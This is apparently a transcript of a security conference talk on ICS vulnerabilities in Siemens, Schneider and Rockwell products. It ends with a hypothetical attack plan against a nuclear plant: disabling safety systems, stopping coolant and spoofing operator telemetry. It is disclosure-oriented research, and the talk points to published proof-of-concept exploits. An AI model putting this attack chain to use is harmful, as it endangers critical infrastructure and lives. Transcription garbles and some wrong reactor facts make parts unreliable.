 So my name is Joe Bingham. I'm going to talk about some ICS vulnerabilities that we found. I'm on the zero-day research team at Tenable. There's only about five or six of us. And what we're going to talk about is in the last year or so we've been looking at a lot of ICS products, different SCADA targets for software and hardware. And we found about a dozen critical vulnerabilities just kind of scattered across the board. And they're critical vulnerabilities because they provide unauthenticated or pre-off remote code execution in the affected systems. So as we go through this talk here, I'll describe four of them in a little bit of detail and then we'll blow up a power plant. Alright, so the first one that we'll look at is in Siemens Step 7, which Step 7 has been around forever. They rebranded it as TIA Portal and its automation services. It's used in all aspects of ICS development and operation from design phase to implementation and all the way down to operations. So TIA Portal has a suite of simulation tools. It does diagnostics and telemetry. It does energy management. So they use it in operation in all sorts of different industries, like down on the plant floor, just for monitoring equipment. And it's built for use by engineers, built for the integrator, as well as built for the operator personnel. So the phone that we found in the software exists in the authentication package of the server. It has a Node.js server and TIA Portal implements functionality for authentication, for authenticating web users and administrators. After authentication, the SSL session is switched over to WebSockets, but they don't use the token that's validated in authentication in the WebSockets session. So of course, you can just skip HTTP authentication and start sending WebSockets commands directly to the server and it will process them. And of course, all administrator functionalities included in the WebSockets protocol. So what can you do with that? You can do a number of things. You can basically do anything that an administrator would want to do on the system. But the best thing that an attacker would want to do is just start a firmware update and you can specify the firmware update server, so basically you can just ask the server to execute any remote URL. You could also do a couple other things like modify permissions for users, create new users, or you could just change application proxy settings, collect system information. So we have a disastrous security hole in this Siemens software that's used on the plant floor in critical operations. And as we go through these phones, I'm going to have different POCs and those are all on our tenable GitHub repository. You can find exploits for all of these vulnerabilities. And I guess while we're talking about Siemens, earlier today at Black Hat, we had University of Tel Aviv. We're looking at the Sematic PLCs and they found some other crazy vulnerabilities in those that basically anyone can come and reprogram the PLCs if it's set up with the default permissions because they all share private keys. So Siemens, I don't know what to say about Siemens. Second one is in Schneider Electric that we'll talk about, Indasoft Web Studio. Earlier this year, we found that Indasoft has several vulnerabilities, including one that allows attacker to send unauthenticated commands to the application. And specifically this command 66 is used to configure the database connection for Indasoft. And in many of the code paths, the file name can actually be user supplied. So in this command 66 message an unauthenticated attacker can specify a database configuration file and ask the server to update from that file and then the Indasoft server parses the malicious update file and executes these rap brackets as WinExec. So an attacker could specify arbitrary commands inside of this database configuration file to run remote code on any Indasoft Web server studio. And here's, so our proof of concept for this was just basically to, in Python, sets up a local SMB server, requests the Indasoft Web Studio to trigger a database configuration update pointing to the controlled SMB server. The server requests the database configuration file and then runs a command based in it. And we just used it to pop a calculator application. And that's available on the GitHub. All of these will be. All right, so the third one, also in Schneider Electric but in hardware. So the Motocon Quantum PLC are kind of like a ubiquitous PLC hardware used all over the place, different industries. And they're favorites because they're modular. You can kind of plug and play them. They have all sorts of different modules in them. They're kind of interchangeable, slide them into the housing, depending on what the needs of your application are. So one of the vulnerabilities that we found in these PLCs, specifically in the communications PLC, is that there's authentication bypass in the communications module, which would allow an attacker to administer the device without credentials. And here's the exploit for that. There it is, pretty easy, right? So apparently zero days easy. This PLC uses just the hidden service API of the communications device to just change the administrator password without authentication. All right, last one. This vulnerability is in Rockwell Automation, RSLinks. And RSLinks Classical, it basically implements Ethernet IP and encapsulates the common industrial protocol SIP messages. So then in their implementation, the packet has a 24-byte header followed by some command-specific data. Now the header lists the command and the length of the command-specific data. So the vulnerability exists. It's a stack overflow caused by a malformed connection path where there's a function in the library engine, engine.dll library in RSLinks, which parses a connection path to extract a port path and stores it in a buffer on the stack. The length isn't verified, and so you can specify up to 256 bytes of the port path and overflow the stack address. And in 32-bit windows, I think the return address is like 200 bytes or so from the beginning of the buffer. So it's a pretty easy stack overflow. All right, that's it. I hope that wasn't too bad. So let's look at the fun part, which will be the application of these vulnerabilities, and I chose to kind of look at a nuclear power plant. So let's see. First things first, let me turn you guys into nuclear physicists in one minute. Nuclear fission, it's a process where a large nucleus splits into two smaller nuclei. So when it splits, it releases energy, right? And in the case of nuclear fission and these power plants, we use uranium-235. Uranium-235 splits into a krypton, and it splits into barium. And with that, it releases three more neutrons, and it releases heat. Each of those neutrons can start another chain reaction, and that's fission. That's it. So uranium-235 is a really nice isotope of uranium, where 238 is the naturally occurring one. So when you hear about people enriching uranium, they're adding more 235 to the 238 natural fuel. And that makes it more chain reactive. So remember the neutrons that are produced, those three neutrons in the reaction. Those are exactly how the fission reaction is controlled, and those are like the most important part of the chain reaction. So we know that the fission reaction creates heat, and the heat is used in these power plants to boil steam, to boil water, which creates steam, and then the steam turns a turbine. And that's it. That's how the power is created. So one minute, right, your experts? I don't know why they even teach this in school. You can just Google it. Like, I don't know, why is nuclear engineering a thing? Just kidding. So the key players in the nuclear reactor. For number one, we have the fuel. That's the basis of the fission chain reaction. In nuclear power, it's uranium in general, sometimes plutonium, but almost all the time uranium. That's the thing that releases heat. It's the key element of fission. We have the moderator. That guy's job is to just slow down the fission reaction by absorbing neutrons. Each of those three neutrons that came out when the nucleus splits, the moderator stops maybe two of those to continue the chain reaction. Now the coolant, its only job is just to take heat away from the core. That's it. The heat is the energy. And then the fourth guy is the control. That's the referee in the game. So you have, when the game starts getting too crazy, the fission reaction is getting out of control. You drop in the control elements. And so the control elements will generally be cadmium, hafnium, boron. All of those materials absorb massive amounts of neutrons, so they just completely stop the fission reaction in seconds or minutes, almost always within seconds. And we'll talk about those more in detail. But let's get into, first, some of the different designs in nuclear reactors. There's a lot of different designs. And I'll go through like four or five of them. The first one is the pressurized water reactor, or PWR. This is by far the most prevalent reactor that's in use in the entire world. Almost all of the power plants in the U.S. are these. They're used in France. They're also used in Japan, Russia, China. And as time goes on, more and more of them go online just because they're so stable. And then it's little brother is the boiling water reactor, which is basically the same as the pressurized water reactor, except that steam isn't created inside of the core. Steam is actually created in a separate heat exchanger, so the reactor is fully liquid. All right, now for the PWR, I'll talk a little bit about the safety systems. This is a diagram of an existing one in Japan, the Kashiwazaki Kariwa PWR in Japan. It came online like within the last decade or so. And the control systems and the instrumentation, they're all on the same network. Of course it's an air gap network separate from the corporate intranet and even one step further from the wide internet. And so you can see that in this diagram, the computers, the control systems are all fully automated, fully computer controlled. They have separate response systems and they have redundant safety systems in them. The emergency core cooling system, which is in the lower left, the ECCS. And then the scram control rod insertion, those are the two referees, the control elements to shut down the reaction. That's right below it to the right of the ECCS. Third type of reactor design is the pressurized heavy water reactor. And they call it, it's almost all of them are in Canada. They call it the Kandu. It's kind of a modification of the PWR. And it's a little bit of a different design because instead of light water, which they call are the PWR and the BWR, like light water reactors, it uses normal water, filtered water. These ones use heavy water, which is like deuterium, which is another hydrogen isotope. And deuterium already has the extra neutron that light hydrogen would have absorbed. So there's reduced neutron absorption, which makes it easier to sustain the chain reaction. And so that makes it so they can use a different kind of field. They don't have to use enriched uranium. So they can use naturally occurring uranium or lower concentration of enriched uranium. But the downside and the cost of that is that the fuel is cheaper. But on the other hand, the design is much less stable. So you end up with these circumstances where reactivity can increase as the water starts to boil in kind of these edge cases. And what that means is that an attacker that has modification access in this presumed attack scenario can actually control the safety systems to create a situation in the core where the fission reaction can occur in what they call a runaway fission reaction where reactivity increases and it's like a feedback loop as the temperature keeps going up, the fission reaction keeps going up and that's exactly what happened in Chernobyl if you're familiar with that. All right, so in the PWR, the PHWR, they can do nuclear power plant, because of those, you know, they're aware that they can have this reactivity runaway obviously so the safety systems are incredibly durable, so they say. This is a diagram here from the U.S. NRC. The United States Nuclear Regulatory Commission generally does studies on what they call diversification in the safety systems and diversification means that there are not common ways that they can fail, right? Like one vulnerability can't shut down both safety systems. So in this case, we have two referees, two of these safety systems, SES-1, which is the absorption rods which drop into the core and they're made of boron, they drop into the core and completely shut off the fission reaction. And SDS-2, which is boric acid injection where there's like several injectors on the side of the nuclear core where they just spray in boric acid to increase the level of boron inside of the liquid which also absorbs all the neutrons immediately stopping the fission reaction. So the point, I guess, is that the safety system relies on computer control through two of these redundant computers that manage information and alarms. They're all in the same network though, right? So you still have this same access vector. But the two critical safety systems use different operating systems. They use different architectures and processor hardware. They use different languages. They're not allowed to use the same languages or executables. So for example, you know, the absorption rods will run on windows and the boric acid injection runs on Linux. The, you know, SDS-1 runs with Fortran, for example, and SDS-2 runs with C++. So that's what they call diversification in nuclear power plants. So even so far, though, as being developed and coded by separate teams, like the software will have same design parameters but coded by different people and run by different teams. So in the end, you know, all it means to us is that you need, you know, one, maybe two more zero days to exploit the system, right? But don't worry. You can use some of the ones that we found. All right. The second to last reactor type is the AGR. I just have to mention it. It's, you know, like the fourth, the fourth most popular one used. The advanced gas reactor, they use these in the UK. It uses natural uranium and data, you know, to deal with, like, this problem of liquid boiling in the core and that causing a problem. These, what they call void coefficients, increasing reactivity, they just said, let's not use liquid. We'll just use gas. So they use carbon dioxide in there as a coolant and you don't have to worry with stuff boiling. So there's no such thing as, there's no such thing as void coefficient issues. And it's also pretty stable. You know, it's comparable to the PWRs and the BWRs. And there's, yeah, those are in the UK. Then the last thing that, obviously, we have to mention is the Russian RBMK, which is just this horribly unstable design. They still use, like, three of them. That's a typo. I think there's only three of them in Russia. They use natural uranium, which, you know, as temperature goes up, the uranium reactivity increases, which is a bad thing. It uses graphite as a moderator and water. It has a positive void coefficient, meaning that as the liquid in the core boils off and creates steam, you get steam between the fuel rods instead of liquid, which increases reactivity. So as heat goes up, reactivity goes up, which is basically, that's why Chernobyl exploded again. You know, so horrible design. They're trying to phase all of these out. Russia has started in the last decade or so pointing PWRs, but they still have some of these in action. Okay, so attack scenario. I think I have to start going a little faster here. So we've got about 10 minutes. So the attack scenario, right? The network is going to be an air gap network. You want to protect it. You have all this critical, very fragile equipment on this network. So we're going to have it air-gapped. So we need some kind of initial infection into some adjacent network. Could you be a corporate or employee network? And that's not too, it's fairly trivial, obviously. Once we're in the adjacent network, some kind of human interaction or other propagation, zero-day, would allow us into their control network. And we've seen this before. Well, I don't need to spend too much time on this. You know, Stux then use Windows Vuln over USB to jump the gap. And then there's a lot of different ways that we've seen in other malware like Triton that do this. So once we're in the network and we're running on an operator panel, for example, one of the, or one of the peripheral systems, we need to get onto a controller. That's where we actually have access to the PLCs, access to the control network, access to some of the safety systems. So what we do is we use another vulnerability. For example, the first one that I talked about, the one of Siemens, in general, you have these controllers on the operational floor which are interfacing with the PLCs for data collection, for telemetry, and in the development cycle for programming the PLCs. So we use that Siemens vulnerability immediately to jump from the operator interface, this peripheral device, onto the controller. And once you have access to the controller, you'll see logic becomes trivial. So in production environments, you can accomplish that in a number of different ways. The malware implant could wrap, for example, the communications through the controlling server to modify control flow for automatic function changes, which is similar to what we saw at Stuxnet. And then for our attack on the power plant, we just need to be able to stop the coolant pumps, number one, that reduces heat exchange out of the core. That's the most dangerous thing as the core temperature increases. It's going to start to melt down. In other extreme cases of the horrible designs that I talked to you about, some of the really bad designs, fission reactivity increases, which is, you know, within minutes you could have some disastrous explosion. So we need to stop the coolant pumps. That's number one, stop heat transfer out of the core. And then secondly, we need to be able to withdraw control rods to increase fission. And then thirdly, we need to be able to stop these safety systems, the safety systems where the control rods are inserted and the core boric acid is sprayed in. And those are on different redundant systems, but they all go through some common logic collector, which ends up being the thing that decides whether or not to turn on the safety systems. So another integral part of creating a successful attack on one of these power plants is by providing false telemetry to the operators. So you provide them the illusion of control to the people that are monitoring the safety systems, that are monitoring the temperature controls and the pressure, the pressure displays. You tell them everything's okay inside of the core while in reality, you know, things are reaching some critical threshold. But during that time period, you don't want anyone to respond. So you buy yourself some time to create this awful situation where fission can go onto this runaway path. So it can happen, you can do that by simulating logic inside of the implant to send pre-calculated temperatures or even, you know, real-time simulated temperatures and pressure and power readings based on the operator's commands. And so as the plant operator attempts to move control rods, for example, to control the fission reaction, the implant sends back simulated signals to say, yes, the control rods are moving, even though we have control of them. All right, and then the last and other critical part of the attack is to disable the critical and redundant manual and automatic safety measures. So the malware can replace logic inside of the ECCS and as well as the scram control rod insertions, and those are the two independent and diverse safety systems that we talked about. That's an NRC regulation. All power plants do that. They have separate, but, you know, separate, not equals, just separate systems which are able to completely shut down the fission reaction. And by disabling the safety systems, we allow, you know, that extra five minutes or even an hour in some cases to provide the reactor core to set it onto this path where it's going to eventually melt down or explode. So worst case scenario, I'll talk about the RBMK, since there's still three of them in action. They're all in Russia, but they're extremely unstable. They have this design parameter where fission can end up on this thermal feedback loop, which makes fission just run out of control. They rely entirely on logical control systems inside of the control networks to maintain stability. So if an attacker achieves control of the safety and control system, they can very easily cause a catastrophic explosion. Another design power plant that would be vulnerable is the KANDU or the PHWR, which is that depressurized heavy water, which uses deuterium. And those are used in Canada and India. They're more stable than the RBMKs, but they're still less stable than the light water reactors we use in the U.S. Because they use unenriched uranium as fuel, the fission reactivity can increase and have a runaway fission reaction. And then the last case that we have to talk about is in the U.S. So while these power plants are much more stable, you know, you can't have this runaway fission reaction where you could have actually like some crazy fission explosion inside the core, but you can still melt them down. So Fukushima and Three Mile Islands, those were both light water reactors, and the only reason they melted down was because the coolant stopped. They use light water as a moderator, and so they're designed to make it impossible to create a circumstance where the fission reaction would grow uncontrolled. And as the conditions of fission increase, reactivity always decreases. As water pressure goes up, the fission reaction slows down. That's how they're designed. Like something, you know, they're not designed to be, they're designed for stability first and cost later. So ending the talk, I guess I'll just say that, you know, the talk is kind of based on fear, uncertainty, but, you know, as I studied and looked through this, you know, I found nuclear power is good. It's clean energy. Almost one-fifth of all of the power in the U.S. is created through nuclear. So, you know, I just have to throw that in there. And I should also say that this type of attack, you know, using our vulnerabilities could have been used on, you know, our simulator. I could have chose any industry. And we could have a similar kind of crazy disastrous effect. So it's not necessarily nuclear power that's bad, right? It's kind of like the vulnerabilities and keeping a reminder on these critical systems to say that basically everything is vulnerable. All right, so remember to check out our GitHub. We have all the POCs for these exploits on there. And you can ask me any questions you want. I'll be on Twitter available on there. And thank you guys very much.